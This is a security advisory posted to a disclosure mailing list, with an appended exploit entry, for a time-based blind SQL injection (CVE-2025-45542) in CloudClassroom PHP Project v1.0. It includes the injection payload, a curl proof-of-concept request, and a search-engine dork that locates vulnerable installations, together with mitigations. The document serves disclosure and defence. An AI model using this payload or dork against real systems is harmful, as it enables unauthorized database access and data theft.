Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: ------------------------------------------------------------------------ CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ------------------------------------------------------------------------ Product: CloudClassroom PHP Project Vendor: https://github.com/mathurvishal/CloudClassroom-PHP-Project Affected Version: v1.0 Vulnerability Type: SQL Injection Attack Type: Remote CVE ID: CVE-2025-45542 Discoverer: Sanjay Singh Vulnerability Details: A time-based blind SQL injection vulnerability exists in the `registrationform` endpoint of CloudClassroom-PHP-Project v1.0. The `pass` parameter is not properly sanitized, allowing an unauthenticated remote attacker to manipulate backend SQL logic and potentially extract sensitive information. Proof of Concept: The vulnerability can be exploited using a POST request with a crafted payload like: `'XOR(if(now()=sysdate(),sleep(6),0))XOR'` Impact: Successful exploitation allows for: - Arbitrary SQL execution - Potential information disclosure - Authentication bypass under certain conditions Recommended Mitigations: - Use prepared statements with parameterized queries - Sanitize input with `mysqli_real_escape_string()` or similar - Implement a Web Application Firewall (WAF) - Enforce least privilege on the application’s DB user References: - GitHub: https://github.com/mathurvishal/CloudClassroom-PHP-Project - Exploit-DB Submission (pending approval) - GHDB Dork (submitted): `inurl:"CloudClassroom-PHP-Project-master" intitle:"Cloud Classroom"` I have also submitted this to Exploit-DB and the Google Hacking Database to assist defenders and researchers. Attached is a detailed advisory in plain text format. Regards, Sanjay Singh https://www.linkedin.com/in/sanjay70023 https://gist.github.com/sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966 --- packet storm appended exploit below --- # Exploit Title: CloudClassroom PHP Project v1.0 - Time-Based Blind SQL Injection (pass parameter) # Google Dork: inurl:CloudClassroom-PHP-Project-master # Date: 2025-05-30 # Exploit Author: Sanjay Singh # Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project # Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip # Version: 1.0 # Tested on: XAMPP on Windows 10 / Ubuntu 22.04 # CVE : CVE-2025-45542 # Description: # A time-based blind SQL injection vulnerability exists in the pass parameter # of the registrationform endpoint. An attacker can exploit this issue by sending # a malicious POST request to delay server response and infer data. # PoC Request (simulated using curl): curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&[email protected]&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub=" # The server response will be delayed if the SQL condition is true, confirming the injection point.